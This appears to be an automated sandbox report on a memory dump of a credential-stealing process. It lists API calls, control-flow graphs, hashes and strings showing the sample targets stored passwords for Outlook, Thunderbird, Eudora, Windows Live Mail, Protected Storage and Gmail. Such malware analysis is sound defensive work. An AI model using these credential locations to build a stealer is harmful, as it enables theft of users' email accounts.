                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                                • API String ID: 379999529-620537770
                                                                                                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                                                                                                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                • API String ID: 52128907-4223776976
                                                                                                                                                                                                • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                  • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,770145ED,?,00000000), ref: 004028A3
                                                                                                                                                                                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,770145ED,?,00000000), ref: 0040297B
                                                                                                                                                                                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                • API String ID: 1497257669-167382505
                                                                                                                                                                                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$??3@DeleteFreeLoadMessageObject
                                                                                                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                • API String ID: 910260487-375988210
                                                                                                                                                                                                • Opcode ID: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                                • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                • Opcode Fuzzy Hash: d6132907f4b3170a7015f464395200ce2fd6d1b2519e675daeb85491024fb36d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Library$FreeLoad_mbscpy
                                                                                                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                • API String ID: 3151552205-317895162
                                                                                                                                                                                                • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 262 444c4a-444c66 call 444e38 GetModuleHandleA 265 444c87-444c8a 262->265 266 444c68-444c73 262->266 268 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 265->268 266->265 267 444c75-444c7e 266->267 269 444c80-444c85 267->269 270 444c9f-444ca3 267->270 277 444d02-444d0d __setusermatherr 268->277 278 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 268->278 269->265 272 444c8c-444c93 269->272 270->265 273 444ca5-444ca7 270->273 272->265 275 444c95-444c9d 272->275 276 444cad-444cb0 273->276 275->276 276->268 277->278 281 444da4-444da7 278->281 282 444d6a-444d72 278->282 285 444d81-444d85 281->285 286 444da9-444dad 281->286 283 444d74-444d76 282->283 284 444d78-444d7b 282->284 283->282 283->284 284->285 287 444d7d-444d7e 284->287 288 444d87-444d89 285->288 289 444d8b-444d9c GetStartupInfoA 285->289 286->281 287->285 288->287 288->289 290 444d9e-444da2 289->290 291 444daf-444db1 289->291 292 444db2-444dc6 GetModuleHandleA call 40cf44 290->292 291->292 295 444dcf-444e0f _cexit call 444e71 292->295 296 444dc8-444dc9 exit 292->296 296->295
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                • String ID: 2t
                                                                                                                                                                                                • API String ID: 3662548030-3527913779
                                                                                                                                                                                                • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                                • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 300 40fb00-40fb35 call 44b090 RegOpenKeyExA 303 40fc37-40fc3d 300->303 304 40fb3b-40fb4f 300->304 306 40fb55-40fb7e RegQueryValueExA 304->306 307 40fc2d-40fc31 RegCloseKey 304->307 308 40fc23-40fc27 RegCloseKey 306->308 309 40fb84-40fb93 call 404734 306->309 307->303 308->307 309->308 312 40fb99-40fbd1 call 4047a5 309->312 312->308 315 40fbd3-40fbdb 312->315 316 40fc19-40fc1d LocalFree 315->316 317 40fbdd-40fc14 memcpy * 2 call 40f802 315->317 316->308 317->316
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                  • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                  • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                  • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Close$memcpy$EnumFreeLibraryLoadLocalOpenQueryValuememset
                                                                                                                                                                                                • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                                • API String ID: 547501411-2409096184
                                                                                                                                                                                                • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 319 402c5d-402c81 call 410a9c 322 402da5-402db0 319->322 323 402c87-402cb7 memset call 410b62 319->323 326 402d9c-402d9f RegCloseKey 323->326 327 402cbd-402cbf 323->327 326->322 328 402cc4-402d2d call 410b1e memset sprintf call 410a9c 327->328 333 402d3a-402d6b sprintf call 410a9c 328->333 334 402d2f-402d35 call 402bd1 328->334 338 402d7a-402d8a call 410b62 333->338 339 402d6d-402d75 call 402bd1 333->339 334->333 342 402d8f-402d94 338->342 339->338 342->328 343 402d9a-402d9b 342->343 343->326
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                                • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                  • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                  • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                • API String ID: 1831126014-3814494228
                                                                                                                                                                                                • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                  • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                  • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                  • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                  • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                  • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                  • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                • Store Root, xrefs: 004443A5
                                                                                                                                                                                                • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                • API String ID: 1502082548-2578778931
                                                                                                                                                                                                • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                                                                                                                                                                                                • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 365 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 370 40f5c3-40f5ea RegQueryValueExA 365->370 371 40f6d9-40f6df 365->371 372 40f6d0-40f6d3 RegCloseKey 370->372 373 40f5f0-40f5f4 370->373 372->371 373->372 374 40f5fa-40f604 373->374 375 40f606-40f618 call 40466b call 404734 374->375 376 40f677 374->376 385 40f66a-40f675 call 404785 375->385 386 40f61a-40f63e call 4047a5 375->386 377 40f67a-40f67d 376->377 377->372 379 40f67f-40f6bf call 4012ee RegQueryValueExA 377->379 379->372 387 40f6c1-40f6cf 379->387 385->377 386->385 392 40f640-40f643 386->392 387->372 393 40f661-40f664 LocalFree 392->393 394 40f645-40f65a memcpy 392->394 393->385 394->393
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                  • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValuememset$CloseFreeLibraryLoadLocalOpen_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4271961475-3916222277
                                                                                                                                                                                                • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 395 4037ca-40381c memset * 2 call 444551 398 4038e2-4038e5 395->398 399 403822-403882 call 4021b6 call 406f06 * 2 strchr 395->399 406 403884-403895 _mbscpy 399->406 407 403897-4038a2 strlen 399->407 408 4038bf-4038dd _mbscpy call 4023e5 406->408 407->408 409 4038a4-4038bc sprintf 407->409 408->398 409->408
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                  • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                  • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                • String ID: %s@yahoo.com
                                                                                                                                                                                                • API String ID: 317221925-3288273942
